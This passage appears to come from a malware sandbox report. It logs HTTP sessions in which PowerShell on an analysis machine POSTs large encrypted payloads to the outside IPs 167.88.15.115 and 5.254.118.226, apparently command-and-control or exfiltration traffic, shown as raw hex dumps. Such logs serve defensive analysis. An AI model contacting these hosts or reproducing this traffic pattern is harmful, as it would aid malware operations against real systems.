Aug 28, 2021 00:07:09.757985115 CEST	7228	OUT	Data Raw: e1 38 69 37 92 67 70 54 35 55 3b 85 5c ee 95 e5 8a 86 f8 b4 52 26 19 75 7c 89 65 7b cf 0d cc f2 95 9b 10 33 a3 6c d3 f7 b1 26 a7 6b f4 67 dd 84 74 b8 65 0f f2 91 6c bc 20 f2 b9 0a 02 f3 84 29 87 47 ef bf de 63 42 1e b2 02 04 2c 7d ac 80 16 aa e0 Data Ascii: 8i7gpT5U;\R&u\|e{3l&kgtel )GcB,}0SwvG\@@sr_!lGPkF;`bv>k5gtHB"g9uwS^\|4vUk"6&.9i.}bB5yHgXB$
Aug 28, 2021 00:07:09.953038931 CEST	7229	OUT	Data Raw: aa 20 b4 a6 07 7b fe ad be b3 1d e3 80 ca 67 c5 25 f9 a3 ce 56 d6 19 58 e6 a3 0d 0d 01 43 73 bb 8c 25 90 50 18 98 ca 6c c3 57 9e 41 49 25 bd 32 88 64 ee 2d 12 21 1f cf 67 35 8e 13 c0 1f 27 c7 6c 3b 0b b1 dd 4c 1e e3 f6 a9 b3 d0 25 b2 5e d2 a2 72 Data Ascii: {g%VXCs%PlWAI%2d-!g5'l;L%^r/3=\Nijk8~556 WPk5W1DpzP]\-M}EsFqt,5$4ydkeW,6)gTXveLoDX*Z:039s?~dK\|v(s57

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.3	49717	167.88.15.115	80	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	kBytes transferred	Direction	Data
Aug 28, 2021 00:06:13.161226988 CEST	1701	OUT	POST / HTTP/1.1 Host: 167.88.15.115 Content-Length: 466 Connection: Keep-Alive
Aug 28, 2021 00:06:13.285268068 CEST	1707	OUT	Data Raw: 06 5c 0b 79 0f e8 d7 36 ed 15 27 73 60 24 80 c8 64 2d d2 79 96 21 04 bb 01 fc 04 08 e3 ec 7d 46 eb b6 90 21 ec 39 62 12 dd 1d 39 d8 3e ad 8f 97 19 64 1c a1 67 74 d1 e3 58 4f 79 11 e4 d0 51 01 96 df 87 a9 92 5f db 2b c9 c1 9a 79 e6 2a 7e 53 6d 6b Data Ascii: \y6's`$d-y!}F!9b9>dgtXOyQ_+y*~SmkwQ,9C]&X.'z/>ly!-f59+\!#J^MMGOt:7qb_gG[)PbS}#}!z@5-Zzs?j
Aug 28, 2021 00:06:13.737119913 CEST	1707	IN	HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Content-Length: 213 Connection: keep-alive Data Raw: 54 bc 4e 3e f8 e0 1f 7a 5f f3 49 ef 1a 88 50 3e 86 50 94 81 65 db 17 b7 0c d2 aa 50 87 01 2f 37 3e df 27 80 55 8a cd 13 a7 80 f3 43 08 fe 22 82 1c 82 3c bf 6c 7f 6b a8 c7 e8 98 52 a4 64 42 22 66 73 1e 51 3a c9 77 ed fd ad ee e3 dc f9 e8 74 79 5b 2f dd 15 78 93 52 79 86 dd 88 b1 8e 36 a4 16 15 8c aa 74 fd 17 59 14 d0 19 ac fa 9b 82 41 e0 cd a3 b6 5c ab 28 20 ca e7 27 dc 59 8a 49 e8 01 51 b0 bd 84 0e 44 44 52 70 77 6e dd 56 5c 58 ea 38 6a 71 23 9d e9 05 b6 8e b3 55 63 50 ea 5b 92 3b 55 b0 98 ae 01 9c a2 5d 83 d0 3d 29 58 be 9e 8f 2f 21 00 e9 42 08 a9 0a ca cf 02 18 59 bc fe f3 c7 d2 97 31 71 b5 4e 68 d3 db f9 b1 70 c4 83 8f 58 49 d6 Data Ascii: TN>z_IP>PeP/7>'UC"<lkRdB"fsQ:wty[/xRy6tYA\( 'YIQDDRpwnV\X8jq#UcP[;U]=)X/!BY1qNhpXI
Aug 28, 2021 00:06:13.747998953 CEST	1707	OUT	POST / HTTP/1.1 Host: 167.88.15.115 Content-Length: 608
Aug 28, 2021 00:06:13.872446060 CEST	1708	OUT	Data Raw: 50 8e d3 a8 27 0f d7 b2 f6 b2 e4 cb 68 eb 77 7a ab 41 d2 66 51 84 86 f1 0e b0 10 1a 47 38 f3 23 cf 20 4f 2b bb f1 a8 15 e4 f6 71 07 57 c4 dd 9f 9a 66 d2 54 6b 64 69 ca 09 e0 9b 76 fe be 6c bf bd c1 fb 48 9c 4c bd b9 98 be 80 5a 14 7f 9b 48 d1 6f Data Ascii: P'hwzAfQG8# O+qWfTkdivlHLZHo~dk#V3'IOESA[*cfZa6=m08KV,8%UAVR?f"T8ML_#t{G9reuGW0)dF/yW~rKH-\|I/#
Aug 28, 2021 00:06:14.274364948 CEST	1708	IN	HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Content-Length: 423 Connection: keep-alive Data Raw: 49 3e ca c2 a9 b8 b0 9a 22 1e 83 ef 62 15 6c 90 d9 21 99 02 81 f7 7b 24 fc 8b f0 9e 19 fb 78 03 81 65 01 e1 02 64 36 1d 89 7a e3 b0 cc a5 43 62 b2 da 73 2d 59 2f 45 7d 98 6f 70 d7 37 41 bf ff af 7c d6 06 6b f4 fe 17 ee 43 fc 3a 8a c0 b8 39 26 df ba 11 3b c3 c4 f4 22 a9 e4 7e f4 82 64 a0 84 39 8c 62 0e 6f 22 ff dd 1d b3 06 95 42 02 f8 8c cc 83 27 44 9e 85 3e 46 e0 d8 03 e6 5b 91 2d ae f5 3f fc 37 57 d5 f1 36 48 8b 87 5c a8 7a 45 62 d1 14 20 2b 57 5b 0b 90 b5 c0 7a 7d e0 68 3a 38 43 33 3d d0 6a a4 91 04 f1 1b ce 9e 26 85 93 e4 32 e6 15 5e 0d ff c7 14 40 30 2d af 4b 21 de 5c 9c ea 37 09 97 22 b5 33 01 75 b8 37 11 0e 23 45 3d 66 ee 1f c6 da 47 90 1e 31 ef 9d 91 b7 e6 75 b0 59 68 8a 72 00 e6 3f 05 4c 6a 65 5c cd bc b7 b4 fb dc c1 30 37 05 07 01 a2 d1 22 43 55 43 32 85 3a f1 2d 14 08 c7 21 8c 37 d1 20 79 80 7c 58 fa bf 02 4b b7 99 f3 69 56 81 34 ab 6c 8d f5 1d 23 6d bb 6c 59 e2 8a 2a a1 8f 03 6a d1 7d 94 da c9 b5 c5 3a cd 13 ac 5d 43 17 40 d7 ed c2 39 f3 5b 0f b4 b3 90 87 1c e2 0a a1 14 00 a5 ba 10 d5 68 e7 44 e5 f7 62 64 01 1b 7c f3 44 e2 be af bf 94 a4 8a 6b 78 c7 30 1c 86 bb df 16 9d c0 88 e7 8a e8 ab e2 6b 1d 12 34 0f bc c5 a9 b9 26 5a d5 73 bb de 43 27 cb 48 bc 9e 9e 35 4f c0 46 b3 f0 84 8b 17 e4 24 a8 f2 71 54 9f 34 a9 e1 7e 31 22 d1 36 96 20 7e fd Data Ascii: I>"bl!{$xed6zCbs-Y/E}op7A\|kC:9&;"~d9bo"B'D>F[-?7W6H\zEb +W[z}h:8C3=j&2^@0-K!\7"3u7#E=fG1uYhr?Lje\07"CUC2:-!7 y\|XKiV4l#mlY*j}:]C@9[hDbd\|Dkx0k4&ZsC'H5OF$qT4~1"6 ~
Aug 28, 2021 00:06:14.306301117 CEST	1709	OUT	POST / HTTP/1.1 Host: 167.88.15.115 Content-Length: 609
Aug 28, 2021 00:06:14.430339098 CEST	1709	OUT	Data Raw: 81 17 fd d7 28 50 4b 5a 93 79 6f d4 50 02 13 24 ba 7e d1 35 71 aa 35 20 2a bc e5 9b b1 11 41 88 ec b6 b4 87 6b 5c 55 4b 50 16 28 db 24 50 af 9f 05 ce 91 7e 1e 20 69 d6 e0 dd ae 6b 69 af a7 82 39 e6 e6 99 4c 8a b8 5e 2a 87 e4 5b 83 58 fb d8 0d 46 Data Ascii: (PKZyoP$~5q5 Ak\UKP($P~ iki9L^[XF~jMm=hTy3T:S^$v}Mn,@EqLn>-O!u#dh1F<"-ZIu$%i`89L#B;$qc[1Rc
Aug 28, 2021 00:06:14.813462973 CEST	1715	IN	HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Content-Length: 56730 Connection: keep-alive Data Raw: c2 5c 7d e8 f3 4e 80 c5 1a 09 cc 48 69 8f 27 28 72 b7 ad 25 6d 43 e6 9b 57 4f 97 35 19 03 38 4c 81 c7 65 f5 2a aa 15 fd 01 fd 7a 6f 79 73 92 18 bd ea 9c 56 ea 5f 3d 6b ea 40 46 b9 f2 d0 69 38 52 a6 63 08 81 c6 8d d0 e1 d3 ac ea 8b cf 8a e9 7c 8d bf eb b9 da a7 42 6f 51 de e6 d6 4c 8b 9a 11 cb 5f af e8 23 1c a2 c5 0e 32 be f9 ee c4 92 40 e9 c3 14 0c 72 f2 25 3a ca 32 7c fd de b1 d7 d4 8e 08 14 f1 63 34 a4 5b 4d bf f7 26 95 9c 7a 2b c2 3a f8 d2 2e 07 22 3d ef ba 49 65 7c f4 d1 2b 5e c3 84 eb d5 3b d7 73 6d c0 94 48 93 69 f4 e0 35 aa 7c cf 51 da 41 c0 7f 61 9d 25 48 13 8b fd 0d eb 15 d6 0b 8a 33 83 00 82 59 14 89 9c fb a1 5b 12 02 09 25 2f 5a 80 67 cf a3 15 8a c4 76 40 4c e4 1d a8 b2 01 f1 d4 d8 63 e1 c1 1d 95 dc 8d 0a 26 6e 12 b0 54 fa 6c 8f 8c 9b b9 7c f7 24 20 89 2b 58 32 f3 74 fe a6 84 e8 0c a8 c8 cd 75 93 21 85 3c b7 94 65 5b 72 c5 be 94 a0 66 a0 8d 9f 56 d7 7c 0f 26 8f fb bf fd 66 0f 0a 6d 8a 37 6d 45 cd 58 56 3c c3 48 d7 b0 cd 97 40 f7 ad 5a 9b d7 d4 aa 2c ab 06 3f c1 3c 99 12 81 18 ee 53 fe 24 04 84 05 46 2c f2 fa 0f 94 6c c8 c2 96 b8 30 f6 a0 0b e7 44 74 67 40 61 3a 71 45 68 bf 5a a9 77 8d 35 39 4d 02 cb ba c9 52 dc ed db 1c eb c9 5f 4d d3 19 24 72 40 21 98 b5 50 55 39 60 7b 8c a9 88 18 3a 68 53 b1 90 04 71 5f 27 a1 6e 7b f2 c2 2a 77 e4 7d 6b aa 28 84 f9 49 ff 3a 8e 83 4a 88 9c c6 38 db 40 a9 78 8e 3e db 7c 67 61 a5 67 0a 81 89 58 ce 4c 4e 44 75 ee b2 d2 f7 47 ee de 9a df 45 5b ed 93 35 fa 7b b9 bd 80 b4 18 16 17 1b c7 06 fd 5f 45 da b3 da b7 03 04 f1 05 de 6d d9 4e 42 1b 76 2f 95 08 c1 3c 6b c0 0d 64 3a 36 aa cb b9 62 55 6f 06 af 99 ec 3d 0b ef 5a 26 c7 93 1c 66 6c 67 54 f5 8c ea de d0 91 76 6d bd 1c 16 0c d2 05 a7 6d 9a c2 eb 12 cd 98 8c 2a 12 45 ab d4 55 9c d7 0c d5 78 f8 db ba 80 07 b7 7b cf ea 2f a5 7b dd ac 71 df d5 bd 68 53 b9 c5 e5 e0 1f 60 ad e9 66 42 77 b3 44 d0 de d1 42 5d 47 e6 75 c3 ab 11 5f 8c 74 21 a4 f7 54 af e3 86 56 43 a3 0a f0 82 0e d7 33 ea cb 14 74 f2 dc a1 41 25 00 38 ba ff ae c1 03 69 73 86 1d e7 b8 72 7b 63 c7 cd f9 c8 d0 18 5e 79 f6 76 40 46 a9 88 0a da fb 55 09 49 89 f1 5b f0 a5 74 5a 3b 57 8d d6 75 59 d2 e1 39 59 e1 ec b3 9b e4 71 62 d2 9a 15 ae 36 3c 18 d1 b6 ec 72 41 d2 8b 9b 48 18 8c a4 1a 98 10 61 cb 7a c1 14 59 fb 69 d9 b5 85 83 db fa 6d 40 4e f4 1f 55 97 b7 e1 df fb 79 c1 c1 dd 34 79 e7 29 60 7e 31 28 ad 97 07 d7 46 2b 6f c6 aa a7 d7 7b 98 e9 93 1f 9c db 3b 98 04 9f 7b e3 08 9b ad 65 d8 2c c2 0c 29 7a 68 76 00 b0 57 74 2b f4 62 8f 75 0e 90 38 26 4d 45 b1 a3 f6 87 4b f3 93 78 64 ae f3 6f d2 49 cb 65 19 1a a7 78 a9 16 1f da 43 f5 12 c4 6a 06 7e 67 08 e1 bc e3 f1 a4 65 c4 c9 4d dc 48 be f6 1a 36 fd b9 1e e5 0d 09 6d f0 e6 8a 88 41 69 8c be 80 16 3a 31 9b d8 bb a6 46 b1 50 85 1b ee 39 ca af e9 fe 7c b4 18 9d 4b 89 d2 14 ce bb ae c7 c0 5d be 67 d1 8a b7 42 fe 7c ad ed 86 54 2c 11 3e ff 49 49 36 c7 e1 53 f3 59 0f e8 57 ae d4 7c fc 7c 75 1d dd 6c 53 90 5a 14 04 9c 23 79 25 1f 60 a9 3c 6c dd 4e 6a 6f b0 af 13 ce 17 82 64 f4 73 25 b6 ad df 8f c6 72 8c 4c d9 ca f1 43 d5 dd b3 49 e3 60 32 0e 0a db e9 6f 8a 42 5b f6 31 88 43 33 da cb d0 43 91 4b c7 ad 58 aa 75 2b 2b 24 ba 57 f3 ea c3 e2 09 31 22 89 68 82 27 97 d3 6f c9 7a 81 ba 54 fa ee 49 23 6a f0 ea a8 25 2f 5e a7 e4 c4 18 3f 20 fa e0 68 67 ba 14 f7 39 d1 ad 6e 74 af 45 84 fb a0 c1 c7 ae 49 d6 b4 b3 eb ab 17 a5 fc a7 4d f3 19 64 0f 22 a8 ca d0 0f f2 98 ff 83 c2 26 48 f3 f2 15 2c 5a 39 61 d7 13 84 3a 60 dc 61 e0 34 c5 e4 29 ff 8a e5 b7 57 fb c0 e2 f0 61 2e 9a c5 3a 08 9d 1b 58 2a d8 47 a5 90 c2 39 44 45 17 81 72 49 ac 33 60 f1 ed 37 63 45 c6 4e e8 6f 7a b8 a7 d0 f3 6c a4 1b 9e 8f d2 79 cb 78 f2 47 6b 5b 1f 0d e8 bb 5e 4a 3e 80 64 00 d3 23 d6 4c ea 02 29 9a 4d 2b fd d2 af 81 c9 d4 4d e8 8d 9a 50 d5 78 6a cb 20 17 69 34 7c 3e 52 40 5d 1f f9 08 5f 70 11 Data Ascii: \}NHi'(r%mCWO58LezoysV_=k@Fi8Rc\|BoQL_#2@r%:2\|c4[M&z+:."=Ie\|+^;smHi5\|QAa%H3Y[%/Zgv@Lc&nTl\|$ +X2tu!<e[rfV\|&fm7mEXV<H@Z,?<S$F,l0Dtg@a:qEhZw59MR_M$r@!PU9`{:hSq_'n{w}k(I:J8@x>\|gagXLNDuGE[5{_EmNBv/<kd:6bUo=Z&flgTvmmEUx{/{qhS`fBwDB]Gu_t!TVC3tA%8isr{c^yv@FUI[tZ;WuY9Yqb6<rAHazYim@NUy4y)`~1(F+o{;{e,)zhvWt+bu8&MEKxdoIexCj~geMH6mAi:1FP9\|K]gB\|T,>II6SYW\|\|ulSZ#y%`<lNjods%rLCI`2oB[1C3CKXu++$W1"h'ozTI#j%/^? hg9ntEIMd"&H,Z9a:`a4)Wa.:XG9DErI3`7cENozlyxGk[^J>d#L)M+MPxj i4\|>R@]_p
Aug 28, 2021 00:06:14.813517094 CEST	1716	IN	Data Raw: cf b7 83 22 2b a4 43 e4 87 b2 7e 70 f5 a5 e0 06 3f e2 5f 7b 2d 7b 92 4c 8c 74 73 dc d1 c3 dd cc 78 e4 6f 93 30 01 0e ba b8 9e 4a 6b 22 b3 da 95 60 af 9d ba 7f 3e 42 53 80 16 33 ef 09 c1 46 bb c0 02 d9 d9 f6 b3 73 ee 3d 9b ff d8 26 6a ed fd 47 eb Data Ascii: "+C~p?_{-{Ltsxo0Jk"`>BS3Fs=&jGcQ,]N~6X@Mx2O3kh`qY%(}W((al \|lWBp("[0"bflZcvg*Ttaum0$\5~z
Aug 28, 2021 00:06:14.813554049 CEST	1718	IN	Data Raw: 07 a0 cd 24 30 f9 45 86 dd c0 5c a3 f8 a5 f6 d1 34 d0 48 0d 71 94 06 99 54 be 0c e5 8a e8 a8 0b fe 1f a2 28 7a d2 cb 9f f3 07 5c 34 9a 58 61 a0 68 fe 18 60 b3 89 92 da a8 c3 da 46 4b 29 00 7d b8 08 27 57 a9 6c f2 f4 5b d5 5e 4e d9 77 8a 61 72 f0 Data Ascii: $0E\4HqT(z\4Xah`FK)}'Wl[^Nwar#6`WN<\|6`[Z.t@9u0;'z0L<~&\^>W,i,uP*?-ytreF= FWr%k_wOD
Aug 28, 2021 00:06:14.813582897 CEST	1718	IN	Data Raw: 4a a8 f2 da 04 86 61 f7 7c 92 49 c1 01 3f d9 93 30 29 b5 db a1 18 92 45 63 a8 73 8c 3b c9 3c e2 a0 2e 8b b2 d3 f2 01 05 4e aa f6 39 f7 bf 80 35 29 95 17 eb aa 42 39 5b 24 da c5 bc 78 98 9a 55 21 1d 28 59 ea 51 9a a5 5d 6e 50 33 33 2a 56 dc 0d 7e Data Ascii: Ja\|I?0)Ecs;<.N95)B9[$xU!(YQ]nP33*V~g
Aug 28, 2021 00:06:14.813618898 CEST	1719	IN	Data Raw: 13 b9 85 fe c4 2c 41 e5 4b ba 6e 05 5b 9c ea a0 30 be 6f 03 ff 78 2b 35 a8 63 4f 57 f0 53 49 e9 f9 45 41 a4 9a bd 14 f7 6f 99 e4 16 55 8f 1a 08 ee 14 af f3 66 cb a5 f2 bd b9 d9 af 52 56 e0 c6 20 85 78 6a 8d c2 43 c6 33 84 03 e1 3e d6 d1 ac d3 4d Data Ascii: ,AKn[0ox+5cOWSIEAoUfRV xjC3>Mdd^6ue30Zp&BNX\*q7VlJvu+`>EVbwpAl;(W"bTqG$CU`r-mbH0R^
Aug 28, 2021 00:06:14.813667059 CEST	1721	IN	Data Raw: 93 fa 91 79 3a 97 bc d1 a0 1c 30 f0 65 26 6c cc cb b1 49 0f 31 19 a2 36 e2 05 3d 18 2f e9 4b 9a 04 d9 76 96 41 1c 94 b2 b1 aa 0c 49 3c 3f 55 af 5e 0a 2e 2e 55 28 5c 06 ae ab 8a 75 e5 7e 4a e8 30 d4 c4 46 cb 00 0c 76 40 70 33 a2 bb d7 11 11 2b 7f Data Ascii: y:0e&lI16=/KvAI<?U^..U(\u~J0Fv@p3+(;<oPo1-.*MN/r4qXU7WaP,BI[P>t!Yy{ICx]>t-_\{+UD/fMrBs'yd5?KdE
Aug 28, 2021 00:06:14.813708067 CEST	1722	IN	Data Raw: 26 f1 25 bd b9 ac ef 43 39 9f af 2d 65 cb ed 74 8a 5e f1 ac b2 4f 93 87 62 14 b8 78 f3 56 eb ba 60 e5 a5 e0 fc 95 72 b8 7b e0 77 35 42 10 47 13 ca 8e a6 bd 25 47 31 2a 4f 94 68 a2 bb 5d 7d b2 0e f7 10 ee 62 6d f8 28 12 4c fa d2 d7 91 ba 37 4c 0d Data Ascii: &%C9-et^ObxV`r{w5BG%G1Oh]}bm(L7LLiq+]pcxgu}llyG/[@kr;XaR=@hqeCMh/?eM`%H,YN@&e\}U!7qWm2M~<f'%p
Aug 28, 2021 00:06:14.813735008 CEST	1722	IN	Data Raw: ee 84 3a f0 41 b5 bd 3f 4c db 62 65 ab 1a 4b fe 34 1c 61 f3 86 5b 02 5a ef 22 1a 87 77 da 40 a6 50 8e 69 a8 4b 26 d7 c3 5f b0 79 15 eb a8 50 55 55 8a c2 88 ea 47 6d fb 0c 22 db 32 b5 28 eb de 78 7f 6a fc 70 b6 fc 3f f1 cd cf 85 d5 66 91 69 fe b9 Data Ascii: :A?LbeK4a[Z"w@PiK&_yPUUGm"2(xjp?fi
Aug 28, 2021 00:06:14.813772917 CEST	1724	IN	Data Raw: 0b de f0 5e a6 53 76 78 9b 9e 0b 27 a9 19 ff c0 39 b9 94 cc f2 44 47 97 b4 35 e2 91 be da 1c ae a3 66 a1 bd 43 34 d4 2f 3e 64 ab ee 1e 92 14 a3 44 5e 17 1c c8 e3 2c 63 d5 b2 2e e9 3d d0 19 50 25 c0 8a 2a 2c 00 e1 3d a6 73 98 ac cd f6 32 18 0e 67 Data Ascii: ^Svx'9DG5fC4/>dD^,c.=P%,=s2g:k{6Pn}jlN"2Jj"\|gMEd>L}vQNo:w(YlxQsyz%b?E_]>RxL+
Aug 28, 2021 00:06:14.813811064 CEST	1725	IN	Data Raw: 9d 84 6f a9 db 21 06 c5 c6 28 3c c7 e7 74 b0 49 0c 39 99 21 33 d6 ff a6 4b 10 b4 2d d8 71 91 23 0e 74 ed dc 46 f5 84 36 1b 0d 63 0e a4 e9 1a b2 cd d4 0b 8e a9 49 5a f0 68 7c e8 64 3d 82 d7 65 c2 73 97 81 95 1c 25 16 a4 0c fb ba ad fd 77 10 67 81 Data Ascii: o!(<tI9!3K-q#tF6cIZh\|d=es%wg)}y"FA]rYR~,yL2>RGV`fVAZM`diFS;zJ:51Jd0\|C4T)p*5O\_
Aug 28, 2021 00:06:14.937855959 CEST	1727	IN	Data Raw: bb af 7b 4c d9 fe f9 da 01 f5 73 6f a1 f6 32 34 9e 14 16 f7 88 a6 37 70 30 3a b2 21 ed 1e c8 a5 48 0c 81 3d 70 34 78 2a 7a 73 ae 54 1d 40 f3 65 5d 10 f7 28 a7 36 93 83 71 21 85 ea 22 fd 48 71 5f 02 15 78 8d cd 2b b7 54 2a 3b d0 2c 42 ef 8a de 9b Data Ascii: {Lso247p0:!H=p4xzsT@e](6q!"Hq_x+T;,B!;XEpRV$lAD{;?[n@4!OU~ME?04yXQ(IId\ClU/9(.V^$oW6pn0VmA[IG

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
30	192.168.2.3	49750	5.254.118.226	80	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	kBytes transferred	Direction	Data
Aug 28, 2021 00:07:10.026913881 CEST	7230	OUT	POST / HTTP/1.1 Host: 5.254.118.226 Content-Length: 180849 Connection: Keep-Alive
Aug 28, 2021 00:07:10.027065039 CEST	7241	OUT	Data Raw: 56 a1 63 16 23 4e 69 18 d2 5a 9b b1 8d 9f 14 06 c2 22 c7 0c 42 a2 43 fe 39 21 81 19 1e c8 d0 f1 a1 ba 3e f6 24 8b 61 b1 c2 eb 74 92 6b 02 45 f7 97 5e 0b 47 32 d4 49 b2 5f 63 db 03 cc 50 f8 0a 88 a9 11 d2 62 1d e0 37 bf 16 48 56 2e af 94 37 db 89 Data Ascii: Vc#NiZ"BC9!>$atkE^G2I_cPb7HV.7q_sjr{}'C9KEa a1dFiC?9 ]L&_P`F-}(1W5F{Q0Z0[ne5>U
Aug 28, 2021 00:07:10.095398903 CEST	7252	OUT	Data Raw: 35 7d 0d 46 a9 da 0a a5 b6 52 e9 d7 7e 20 5d 60 34 3a 26 2d 1a a4 af c6 8a 4b 84 57 ee 65 fe 4c ce 21 17 28 dc 5a 3c d4 e1 79 7d 97 8a fa ff 7a 1d 06 85 19 7f 3a 87 74 43 49 08 2d 79 0b 3d a1 33 05 94 9d fd 8a 21 79 88 9a 8b f3 4f db f1 ff 92 4f Data Ascii: 5}FR~ ]`4:&-KWeL!(Z<y}z:tCI-y=3!yOOVclac+aKJh\|C /6JG=G:c$DT^Z}O{@l"lObbQ@x)^\|rRm~7WZmCfvA~\F
Aug 28, 2021 00:07:10.095482111 CEST	7268	OUT	Data Raw: 34 b1 03 9f f1 57 67 0f dd 4a c3 93 5b 5c ff d5 65 1a 8c 5f 1b 62 20 fe df cc 1d 46 9b 43 b2 88 a3 e3 73 1c 65 92 23 0c 88 11 4d c8 10 f2 c4 ab 90 49 26 d8 ec 8f 18 fa ef 21 9f b5 aa 18 5c 2d fe a5 fe 37 4a 06 24 c2 4f cb 6f bc 7b 69 71 a3 28 3c Data Ascii: 4WgJ[\e_b FCse#MI&!\-7J$Oo{iq(<G(,1C *<TcCp}u.\|MM%oU8#a?7Vo0k+{iI3'kJR%z:MDZ($<9goX(D4jUTLCf.k
Aug 28, 2021 00:07:10.178859949 CEST	7289	OUT	Data Raw: e6 8f ec a4 d1 3e f7 e0 c8 01 90 c2 41 d3 98 e0 d3 07 66 01 85 63 f2 ee 67 b7 e0 80 72 e5 ea 70 1a 87 89 04 1d be d8 7e 5b 6b 51 c8 12 1d 59 b9 01 ad fb 3e 4a a8 38 06 6d e6 fd 41 54 e6 ee b0 0d cb 67 7a 4f a3 2f c0 4b 44 82 3a f5 df 46 1f 8d 27 Data Ascii: >Afcgrp~[kQY>J8mATgzO/KD:F'fP"RdBFQ9JnZ{p1;/\%8bcp`>2r^R\`M DhM$90SV\|lE,Wn']#"vfUR4~g
Aug 28, 2021 00:07:10.179688931 CEST	7311	OUT	Data Raw: fa f1 20 5c fd 99 e3 70 29 b8 e1 83 eb 53 14 8f 98 c9 70 a7 91 e2 ba 3c 8e c9 8d 28 e1 ab 0c d3 de ff a1 b8 44 6a b3 14 0c 17 36 72 86 d3 cc 5d 86 c0 fe cb 85 34 58 8f b8 3b d4 0c 30 f4 49 a6 c7 9f b7 7c d0 1b c7 0f de 51 b8 0d a7 5f 79 d4 de 79 Data Ascii: \p)Sp<(Dj6r]4X;0I\|Q_yy}6dSoJ-,<SC>aUTb`lwyu'J`'E{tIWIK}%addm$o:T1/H\|E3MdQ^sj
Aug 28, 2021 00:07:10.179847002 CEST	7319	OUT	Data Raw: 49 16 31 45 be 1e b8 ff ac b9 47 c7 1a 99 e4 db 3d ce 3a b9 43 a9 5d cd 59 7e 71 1c 05 86 5d 38 f7 53 49 d5 8b e6 58 66 e1 01 d6 c4 1b 3a f8 f6 a0 38 e9 be d9 0b 10 f8 84 f4 11 e5 74 a6 a8 9b 93 28 81 61 11 5c 4b e6 2c b6 1e 9e e6 21 fb ad fe 67 Data Ascii: I1EG=:C]Y~q]8SIXf:8t(a\K,!gtZ><S~MO%\|S\|Jj-%I-\2d';N_`r=N<(;<=[2"\vhg-f$9pXs&nGmr91N=+
Aug 28, 2021 00:07:10.251466036 CEST	7342	OUT	Data Raw: c3 a2 ca 9d 09 59 80 05 18 26 44 40 48 1f 44 7e d4 4a 09 b3 bb a7 35 f3 d6 73 a2 37 c6 c5 fd 36 ce 95 3a f7 a7 ad 50 19 8b 25 f5 73 eb 31 46 8d b9 7f 88 76 31 13 7c 2b db 89 d8 e7 47 0d 49 1f af 8d bf b1 47 e8 f8 5f 0a 2d 30 5a f5 14 f6 50 5f ca Data Ascii: Y&D@HD~J5s76:P%s1Fv1\|+GIG_-0ZP_R:lsfm'UV#Vg @V{*P+,12b4Ic`,q &JFehM$d6}JE.5PJ#q+;mL"\|7X}oP"r
Aug 28, 2021 00:07:10.251534939 CEST	7370	OUT	Data Raw: bc 0a 97 c0 28 fb 8b a9 df 95 1d 05 f3 0e 23 00 c4 2f 3c 86 81 c4 67 02 c8 9a 09 79 14 9e 55 ee 7d d4 04 69 c7 e7 fe 5c 76 d9 37 b5 31 33 60 16 65 a9 34 2d f2 d3 f9 4c d6 7a f5 8b 8a 4f 78 c7 ad 92 57 99 5f 97 27 9a 60 f3 5c 3d 88 e5 50 b6 b6 ff Data Ascii: (#/<gyU}i\v713`e4-LzOxW_'`\=PgC:wRFucRRM>wl"w6d@Ld}V&shOiu9tqLiq2H*?-7I&G)xi%%!an6/p#j:}
Aug 28, 2021 00:07:10.251564980 CEST	7379	OUT	Data Raw: a2 95 c3 bd 68 13 83 7c 18 5f b6 02 ab dc 3d 9a 9d 66 54 ef d4 b7 cf 1e 5b 32 44 6d 19 5e 1c 4e 67 72 c0 d0 bb 67 a4 32 30 a9 f8 6f 63 13 09 14 9e 8a 66 48 62 60 10 52 5b 7e ff b9 43 dd 1d 0e 41 27 d2 49 68 91 31 5b 1f 25 50 90 47 c3 37 30 62 d9 Data Ascii: h\|_=fT[2Dm^Ngrg20ocfHb`R[~CA'Ih1[%PG70bh@5X&2$90Qk6058gvJVpZsjDOf#g-PhSME'?7w]TLQ`J#5.mTaRTOGZ[oYAg&y+S39FPg
Aug 28, 2021 00:07:10.251578093 CEST	7384	OUT	Data Raw: 61 ab e0 9c 96 ab cc 1a 4b e7 0c fb 2a b6 7e 1f ff 68 73 d7 dd 61 c9 49 41 d2 9f fc 89 c5 19 35 2a 29 89 66 c1 ce de 04 30 6f 23 d4 23 f9 11 a0 06 23 02 90 19 d6 08 5c dc 45 52 ee 87 ce 70 2b a0 66 08 2d 57 28 84 fe d9 0a 87 90 53 8a 31 9c 15 0c Data Ascii: aK~hsaIA5)f0o###\ERp+f-W(S1/Ib00k+h\Oo(CU3;_-\|CJ)sCq/0kt%x2xho@;R8tXX#!g1},B<I

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
31	192.168.2.3	49751	5.254.118.226	80	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	kBytes transferred	Direction	Data
Aug 28, 2021 00:07:11.219141960 CEST	7579	OUT	POST / HTTP/1.1 Host: 5.254.118.226 Content-Length: 180994
Aug 28, 2021 00:07:11.219221115 CEST	7591	OUT	Data Raw: 39 d8 8a 3a 58 6d 63 17 01 cc 9b 63 4b fd 04 ad 66 da 95 c4 ca b5 b1 dc 09 c5 af d1 fe 76 88 3c 04 f6 09 c9 da 41 d7 6f 5f 7a 16 7e 87 be a1 77 7e 87 43 0a f5 80 09 82 27 ad 31 92 bd 90 17 89 45 5f 60 53 f4 3a d1 26 04 27 65 51 a0 33 55 49 25 38 Data Ascii: 9:XmccKfv<Ao_z~w~C'1E_`S:&'eQ3UI%8Sx3~E.Fc9)_NEXn>Wdou-xug8(,5rI[+0ANv,J(i_0n+@\a%kE@d}r+(42&>b

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
32	192.168.2.3	49752	5.254.118.226	80	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	kBytes transferred	Direction	Data
Aug 28, 2021 00:07:11.353411913 CEST	7598	OUT	POST / HTTP/1.1 Host: 5.254.118.226 Content-Length: 180737
